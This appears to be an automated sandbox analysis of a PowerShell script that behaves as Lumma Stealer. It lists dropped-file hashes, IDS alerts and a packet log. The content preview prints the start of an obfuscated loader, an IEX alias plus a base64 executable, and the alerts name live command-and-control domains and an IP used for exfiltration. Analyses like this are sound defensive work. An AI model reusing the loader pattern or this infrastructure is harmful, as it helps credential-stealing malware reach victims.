                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="694441" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1628158735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                                          MD5:3A925CB766CE4286E251C26E90B55CE8
                                                                          SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                                          SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                                          SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6225
                                                                          Entropy (8bit):3.736108937771384
                                                                          Encrypted:false
                                                                          SSDEEP:96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8
                                                                          MD5:0F1D7D03A39B7AB28C7E2C75F3CF8332
                                                                          SHA1:70761CBE65B6EFC0347E759757688C3C84CB0C3F
                                                                          SHA-256:719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A
                                                                          SHA-512:BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. .....*_........p..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...u....p...F...p......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=;ZGw..........................3*N.A.p.p.D.a.t.a...B.V.1.....;ZDw..Roaming.@......EW.=;ZDw..........................-0..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=;ZBw..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=;ZBw..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=;ZBw....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=;ZBw....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=;ZHw....9...........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6225
                                                                          Entropy (8bit):3.736108937771384
                                                                          Encrypted:false
                                                                          SSDEEP:96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8
                                                                          MD5:0F1D7D03A39B7AB28C7E2C75F3CF8332
                                                                          SHA1:70761CBE65B6EFC0347E759757688C3C84CB0C3F
                                                                          SHA-256:719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A
                                                                          SHA-512:BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. .....*_........p..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...u....p...F...p......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=;ZGw..........................3*N.A.p.p.D.a.t.a...B.V.1.....;ZDw..Roaming.@......EW.=;ZDw..........................-0..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=;ZBw..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=;ZBw..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=;ZBw....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=;ZBw....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=;ZHw....9...........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                          Category:dropped
                                                                          Size (bytes):1835008
                                                                          Entropy (8bit):4.417449902710954
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Mcifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuN/5+:hi58NSWIZBk2MM6AFB1o
                                                                          MD5:B758660C24748E73B8A4D2EDCE9851CB
                                                                          SHA1:951DF3CE7AC9E6998523954A92130A4F6864C078
                                                                          SHA-256:D93D4925F9BAA62DB826125A4D95561817741B1457EBDDA2AD20B88464F9AF2C
                                                                          SHA-512:C3BA27F08D88CD16504B064A04F9F4B1FEB2DB8A3832AF95B4D1D127B235D81CBD05E74FFF03C5F60B25F652A6CCAD6C97BAD8C72837375A60693C4F28900FB7
                                                                          Malicious:false
                                                                          Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.G...p..............................................................................................................................................................................................................................................................................................................................................s..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          File type:ASCII text, with very long lines (65481), with CRLF line terminators
                                                                          Entropy (8bit):5.485284056284138
                                                                          TrID:
                                                                            File name:176.113.115.225.ps1
                                                                            File size:546'028 bytes
                                                                            MD5:eaf7ebe973ee32e26027ba74eb211b0c
                                                                            SHA1:29f2261e2a37e97045d000cc1bd0fb614cff9f74
                                                                            SHA256:97a191d90077f093ce6e0d472167b36bb648de846098ed494d981c1076d358f5
                                                                            SHA512:c35bd999fb35a1a28816622cdf743e5d2287b1a5933229d682ac0da1c96a91fc81dcdcd2daeac1e9dff79fc74f1c3af79e044037ff0318d13380addc7067b966
                                                                            SSDEEP:12288:ZcTOT1uStOOovc4mkab9NY+2GyKKIoKUOwFL9:ZcTPStkvcVZT2GyQoKUOwFL9
                                                                            TLSH:E3C48D3141437D5E3F9A2ECA6400ADC10C8D3D97B614D584AE8A4276B2BE23B5F6D9FC
                                                                            File Content Preview:.... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA
                                                                            Icon Hash:3270d6baae77db44

                                                                            Download Network PCAP: filteredfull

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-27T15:58:20.506711+01002059421ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz)1192.168.2.7619991.1.1.153UDP
                                                                            2025-01-27T15:58:20.519335+01002059423ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz)1192.168.2.7611681.1.1.153UDP
                                                                            2025-01-27T15:58:21.067993+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749743104.21.29.142443TCP
                                                                            2025-01-27T15:58:21.067993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749743104.21.29.142443TCP
                                                                            2025-01-27T15:58:21.593553+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749743104.21.29.142443TCP
                                                                            2025-01-27T15:58:21.593553+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749743104.21.29.142443TCP
                                                                            2025-01-27T15:58:22.192148+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749751104.21.29.142443TCP
                                                                            2025-01-27T15:58:22.192148+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749751104.21.29.142443TCP
                                                                            2025-01-27T15:58:22.688671+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749751104.21.29.142443TCP
                                                                            2025-01-27T15:58:22.688671+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749751104.21.29.142443TCP
                                                                            2025-01-27T15:58:23.347094+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749759104.21.29.142443TCP
                                                                            2025-01-27T15:58:23.347094+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749759104.21.29.142443TCP
                                                                            2025-01-27T15:58:24.082393+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749759104.21.29.142443TCP
                                                                            2025-01-27T15:58:24.600432+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749771104.21.29.142443TCP
                                                                            2025-01-27T15:58:24.600432+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749771104.21.29.142443TCP
                                                                            2025-01-27T15:58:26.035507+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749782104.21.29.142443TCP
                                                                            2025-01-27T15:58:26.035507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749782104.21.29.142443TCP
                                                                            2025-01-27T15:58:27.552936+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749791104.21.29.142443TCP
                                                                            2025-01-27T15:58:27.552936+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749791104.21.29.142443TCP
                                                                            2025-01-27T15:58:29.081608+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749802104.21.29.142443TCP
                                                                            2025-01-27T15:58:29.081608+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749802104.21.29.142443TCP
                                                                            2025-01-27T15:58:33.152602+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749826104.21.29.142443TCP
                                                                            2025-01-27T15:58:33.152602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749826104.21.29.142443TCP
                                                                            2025-01-27T15:58:33.908893+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749826104.21.29.142443TCP
                                                                            • Total Packets: 94
                                                                            • 443 (HTTPS)
                                                                            • 53 (DNS)
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 27, 2025 15:58:20.539253950 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:20.539282084 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:20.539356947 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:20.543554068 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:20.543572903 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.067914009 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.067992926 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.071176052 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.071191072 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.071506023 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.114439011 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.149066925 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.149100065 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.149195910 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.593539953 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.593928099 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.594022036 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.620739937 CET49743443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.620769024 CET44349743104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.720988989 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.721041918 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:21.721170902 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.722193003 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:21.722214937 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.192080021 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.192147970 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.193454981 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.193464041 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.193810940 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.195167065 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.195183039 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.195255041 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.688731909 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.688798904 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.688849926 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.688864946 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.688879967 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.688918114 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.688930035 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.689243078 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.689281940 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.689292908 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.689306021 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.689359903 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.689368963 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.693701029 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.693736076 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.693777084 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.693793058 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.693835974 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.777348995 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.777446032 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.777488947 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.777506113 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.777528048 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.777578115 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.777585983 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.777601004 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.777653933 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.777806997 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.777818918 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.777844906 CET49751443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.777851105 CET44349751104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.867619991 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.867643118 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:22.867719889 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.868463039 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:22.868478060 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:23.347016096 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:23.347094059 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:23.348372936 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:23.348377943 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:23.348751068 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:23.358284950 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:23.358376026 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:23.358422041 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.082366943 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.082676888 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.082767010 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.082889080 CET49759443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.082906008 CET44349759104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.097948074 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.097982883 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.098092079 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.098620892 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.098630905 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.600297928 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.600431919 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.602161884 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.602170944 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.602508068 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.604451895 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.604603052 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.604634047 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:24.604743004 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:24.647334099 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.478101015 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.478213072 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.478387117 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.478387117 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.549873114 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.549911022 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.549999952 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.550508976 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.550529957 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:25.786463022 CET49771443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:25.786480904 CET44349771104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.035379887 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.035506964 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.036654949 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.036662102 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.036911964 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.038115978 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.038223982 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.038259029 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.038321018 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.038332939 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.989608049 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.989686966 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:26.989751101 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.989871025 CET49782443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:26.989887953 CET44349782104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.072506905 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.072526932 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.072609901 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.072885036 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.072895050 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.552804947 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.552936077 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.554615021 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.554621935 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.554853916 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:27.556210041 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.556353092 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:27.556379080 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.421416998 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.421781063 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.421932936 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.421999931 CET49791443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.422017097 CET44349791104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.604146004 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.604182959 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:28.604283094 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.604566097 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:28.604576111 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.081451893 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.081608057 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.083261967 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.083273888 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.083524942 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085067987 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085381031 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085416079 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085503101 CET49802443192.168.2.7104.21.29.142
                                                                            Jan 27, 2025 15:58:29.085527897 CET44349802104.21.29.142192.168.2.7
                                                                            Jan 27, 2025 15:58:29.085608959 CET49802443192.168.2.7104.21.29.142
